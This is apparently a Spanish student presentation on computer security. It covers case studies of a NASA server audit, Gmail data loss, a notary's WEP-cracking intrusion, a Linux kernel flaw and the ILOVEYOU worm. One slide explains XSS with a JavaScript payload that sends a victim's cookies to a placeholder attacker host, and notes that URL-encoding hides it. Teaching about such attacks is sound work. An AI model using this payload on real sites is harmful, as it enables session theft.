27
SEGURIDAD EN COMPUTACIÓN E INFORMÁTICA Integrantes : Pasache Papa Jesus Cabezudo Martinez William Agüero Ortega Isaac Chura Huashuayo Jorge Luis TEMAS: TIC * RIESGOS * AMENAZAS * IMPACTOS * VULNERABILIDADES

Examen parcial

Embed Size (px)

Citation preview

Page 1: Examen parcial

SEGURIDAD EN COMPUTACIÓN E INFORMÁTICA

Integrantes : Pasache Papa JesusCabezudo Martinez William Agüero Ortega IsaacChura Huashuayo Jorge Luis

TEMAS: TIC

* RIESGOS* AMENAZAS* IMPACTOS* VULNERABILIDADES

Page 2: Examen parcial

RIESGOS INFORMÁTICOS

Page 3: Examen parcial

VULNERABILIDAD EN LA NASA

Page 4: Examen parcial

VULNERABILIDAD EN LA NASA

Seis servidores de la NASA expuestos a Internet han mantenido vulnerabilidades críticas que podrían haber puesto en peligro las misiones del Transbordador Espacial, la Estación Espacial Internacional y el telescopio Hubble al abrir la puerta a ataques Internet.

Según el inspector general de la NASA, las vulnerabilidades que dejaron expuestos los servidores a ataques Internet podrían haber sido descubiertas por un programa de supervisión de seguridad aprobado por la agencia el año pasado, pero aún sin implementar.

Page 5: Examen parcial

VULNERABILIDAD EN LA NASA

La auditoría llevada a cabo para investigar el incidente ha revelado también que algunos servidores expuestos contenían claves de encriptación, contraseñas encriptadas e información sobre cuenta de usuarios, datos que podrían haber sido utilizados por los atacantes para acceder a la red de la agencia sin autorización.

Page 6: Examen parcial

CASO DE GMAILAl menos 150 mil usuarios de Gmail perdieron la información de sus cuentas por un accidente, reportó Google. En una primera instancia el reporte indicaba que las pérdidas eran por más de medio millón de cuentas, no obstante la información fue rectificada.Los usuarios experimentaron problemas para acceder a sus cuentas de Gmail, cuando por fin lograron ingresar al correo se encontraron con la sorpresa de que todo la bandeja de entrada y archivos estaban en blanco, con excepción de los tres mensajes de bienvenida que se generan cuando se crea una nueva cuenta.

Page 7: Examen parcial

CASO DE GMAIL

Google explicó que menos del 0,08% de los usuarios fueron afectados por el accidente que reseteó complemente las cuentas, sin embargo en el Tablero de Estado de la Aplicación sólo está el mensaje “Nuestro equipo continúa investigando el problema. Volveremos a dar una actualización by February 28, 2011 9:00:00 AM UTC-6 con más información sobre este problema. Gracias por su paciencia”, y así se repite en los tres mensaje anteriores. Aún no se determina el cuál es el error o cómo se produjo.

Page 8: Examen parcial

Caso de seguridad Inalambrica Caso pérdida de información importante en

una notaria limeña- Enero 2011 Una conocida notaría limeña fue victima de

un ataque de robo y destrucción de información, debido a una falla de seguridad inalámbrica, expuesta gracias a una falta de planificación en tecnologías de información.

Page 9: Examen parcial

El ataque fue realizado desde una vivienda cercana, al realizar un crackeo de la clave inalámbrica WEP mediante la herramienta WIFISLAX, ya que ésta clave era solo de 64 bits, admitía 5 caracteres, y es muy sencilla para esta herramienta descifrarla

Page 10: Examen parcial

Se conectaron a la red inalámbrica con éxito, entonces revisaron la tabla DHCP

Page 11: Examen parcial

Lo mas posible es que se haya utilizado un programa para escanear la red Lan, y también descubrir los clientes no conectados con DHCP e inalámbricos

Page 12: Examen parcial

Se ubicó a los usuarios de la red y se realizo exploración vía FTP a todos ellos.

Page 13: Examen parcial

Se lograron tener acceso a los archivos importantes debido a que tenían la unidad D de cada equipo en modo compartido y con todos los permisos. Entonces la información fue sustraída y posteriormente eliminada del disco duro de los equipos principales.

Page 14: Examen parcial

Por ultimo, revisaron en la tabla de puertos habilitados del router aquellos equipos con conexiones interesantes, entre otros, ubicaron un servidor de archivos con la conexión remota activada(3389)

Page 15: Examen parcial

Dada que la cuenta administrador, no tenia contraseña, se logró establecer acceso irrestricto al equipo, al dominio, a información personal y control sobre los usuarios, permitiéndoles durante 2 meses obtener datos recientes sobre litigios, contratos, etc. De manera sigilosa, y fueron descubiertos al hacer una auditoria de la red.

Page 16: Examen parcial

Caso kernel - Descubren grave vulnerabilidad en kernel de Linux

  La vulnerabilidad se encuentra -específicamente- en la implementacion del

protocolo Reliable Datagram Sockets (RDS), afectando a las máquinas que tengan activada la opción CONFIG_RDS y no tengan restricciones a los usuarios sin privilegios de cargar los módulos de paquete familiar, lo que sucede con la mayoría de las distribuciones del sistema operativo. VSR Security comenta:

Debido a que las funciones del núcleo responsable de la copia de datos entre el núcleo y el espacio de usuario no pudo verificar que un usuario-proporcionado por la dirección residido efectivamente en el segmento de usuario, un atacante local podría emitir función especialmente diseñado toma las llamadas a escribir valores arbitrarios en la memoria del kernel.Aprovechando esta capacidad, es posible que los usuarios sin privilegios puedan escalar privilegios a root.

Un exploit ha sido liberado por la misma compañia de seguridad para demostrar lo peligroso de la vulnerabilidad. Al mismo tiempo, la gente de H Security no espero más tiempo para tomar el exploit y testearlo en Ubuntu 10.04 (64-bit), con un resultado exitoso, pero desastroso para el sistema.

Page 17: Examen parcial
Page 18: Examen parcial

Un parche para solucionar el problema ha sido enviado a Linus Torvalds para que el próximo kernel no incluya el problema, aunque se espera que cada distribución incluya una actualización al sistema operativo que corrija la vulnerabilidad.

Impacto: La caída del Sistema operativo . Acceso a personas ajenas a la empresa para el

total dominio de la información de esta empresa. Perdida de información vital. Información alterada de mala fuente.

Page 19: Examen parcial

CASO APLICATIVO SOBRE LA VULNERABILIDAD

INYECCION DE CODIGO MALICIOSO

Page 20: Examen parcial

Supongamos que la página de inicio de CómoFunciona.net es vulnerable a un ataque por secuencia de comandos entre páginas Web ya que en ella puede aparecer un mensaje de bienvenida con el nombre del usuario como un parámetro:

http://es.kioskea.net/?nom=Jeff.

Una persona malintencionada podría llevar a cabo un ataque XSS al proporcionar a la víctima una dirección que reemplace el nombre "Jeff" con un código HTML. En especial, podría transferir el siguiente código JavaScript como un parámetro para redireccionar al usuario a una página controlada por el pirata informático:

<SCRIPT> document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie </SCRIPT>

Page 21: Examen parcial

El código anterior recupera las cookies del usuario y las envía

como parámetros a una secuencia de comandos CGI. El siguiente código transferido como un parámetro sería

demasiado obvio:

http://es.kioskea.net/?nom=<SCRIPT>document.location ='http://site.pirate/cgi-bin/script.cgi?'+document.cookie</SCRIPT>

No obstante, la codificación de la dirección URL permite ocultar el ataque:

http://es.kioskea.net/?nom=%3c%53%43%...

Page 22: Examen parcial

CASO APLICATIVO DEL IMPACTO DE LAS AMENAZAS

AMENAZA DEL GUSANO “I LOVE YOU” o

“LOVE LETTER”

Page 23: Examen parcial

El día jueves 4 de mayo del 2000 una alarma sacudió al mundo de las computadoras, los creadores del virus conectaron con el proveedor de acceso a Internet (ISP) llamado Internet Sky y soltaron su ”monstruo”, se trató de un gusano informático que se propagaba rápidamente vía correo electrónico.

El sistema operativo afectado por el gusano fue Windows con el Windows Scripting Host activado. ILOVEYOU es un programa, realizado en Visual Basic, que tiene la habilidad de mandarse a si mismo vía correo electrónico a todas las direcciones contenidas en la libreta del programa Microsoft Outlook de la computadora infectada. Después de instalarse en la computadora, el gusano altera imágenes y archivos de audio.

Page 24: Examen parcial

El asunto del correo electrónico era “ILOVEYOU”, con un adjunto de nombre "LOVE-LETTER-FOR-YOU.TXT.vbs". En el cuerpo del mensaje se leía: "kindly check the attached LOVELETTER coming from me".

Page 25: Examen parcial

Consecuencias del impacto de esta amenaza:

Varias empresas cesaron sus actividades, como la compañía de telefonía Vodafone, fabricas de Dell en Irlanda, Sky Internet, entre otras.

Muchas empresas en todo el mundo de varios países llegaron a tener una cantidad

considerable de computadoras infectadas. Las compañías tuvieron que desconectar sus

servidores de correos. Más de 10 millones de ordenadores

infectados.

Page 26: Examen parcial

Conclusiones

1.- El exceso de confianza en la estrategia de seguridad de una compañía, puede hacer que ésta se vuelva vulnerable si esta no es sometida periodicamente a analisis retrospectivo.

2.- Es importante considerar planes de seguridad y a su vez el riesgo informático para que las amenazas tanto internas como externas no afecten el funcionamiento optimo de la organización.

Page 27: Examen parcial

Recomendaciones

Es recomendable realizar una auditoria periodica a la seguridad interna y perimetral de la red corporativa

Manejar el tema de la cultura organizacional a todo nivel para tener conciencia de la seguridad.

Las actualizaciones de todo tipo y a todo nivel , son necesarias para certificar una mayor capacidad de respuesta ante amenazas